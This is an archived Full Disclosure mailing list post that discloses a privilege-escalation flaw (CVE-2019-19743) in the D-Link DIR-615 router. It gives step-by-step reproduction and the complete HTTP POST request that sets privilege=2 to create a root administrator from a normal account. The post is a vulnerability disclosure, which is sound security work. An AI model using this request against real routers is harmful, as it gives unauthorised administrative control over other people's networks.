<!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="34"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#35">By Date</a>
<a href="36"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="34"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#35">By Thread</a>
<a href="36"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>
</div>
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">D-Link DIR-615 — Vertical Prviliege Escalation</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
<em>From</em>: Sanyam Chawla <infosecsanyam () gmail com>
<em>Date</em>: Mon, 16 Dec 2019 20:37:39 +0530
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">######################################################################################
# Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation
# Date: 10.12.2019
# Exploit Author: Sanyam Chawla
# Vendor Homepage: <a rel="nofollow" href="http://www.dlink.co.in">http://www.dlink.co.in</a>
# Category: Hardware (Wi-fi Router)
# Hardware Link: <a rel="nofollow" href="http://www.dlink.co.in/products/?pid=678">http://www.dlink.co.in/products/?pid=678</a>
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019–19743
#######################################################################################
Reproduction Steps:
1. Login to your wi-fi router gateway with normal user credentials [i.e:
<a rel="nofollow" href="http://192.168.0.1">http://192.168.0.1</a>]
2. Go to the Maintenance page and click on Admin on the left panel.
3. There is an option to create a user and by default, it shows only
user accounts.
<<a rel="nofollow" href="https://1.bp.blogspot.com/-f-MOwxhgrRI/XfUZSszN8TI/AAAAAAAAFb8/v2193GabEVYOO_Ax89FPrBymNTxXc32_wCLcBGAsYHQ/s1600/1.PNG">https://1.bp.blogspot.com/-f-MOwxhgrRI/XfUZSszN8TI/AAAAAAAAFb8/v2193GabEVYOO_Ax89FPrBymNTxXc32_wCLcBGAsYHQ/s1600/1.PNG</a>>
4. Create an account with a name(i.e ptguy) and change the privileges
from user to root(admin) by changing privileges id (1 to 2) with burp suite.
Privilege Escalation Post Request
POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: <a rel="nofollow" href="http://192.168.0.1">http://192.168.0.1</a>
Connection: close
Referer: <a rel="nofollow" href="http://192.168.0.1/userconfig.htm">http://192.168.0.1/userconfig.htm</a>
Cookie: SessionID=
Upgrade-Insecure-Requests: 1
username=ptguy&*privilege=2*&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
5. Now log in with newly created root (ptguy) user. You have all
administrator rights.
Please let me know if any other information required from my side for this
vulnerability.
Best Regards,
Sanyam Chawla
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives & RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="34"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#35">By Date</a>
<a href="36"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="34"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#35">By Thread</a>
<a href="36"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>D-Link DIR-615 — Vertical Prviliege Escalation</strong> <em>Sanyam Chawla (Dec 17)</em>
</li></ul>
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>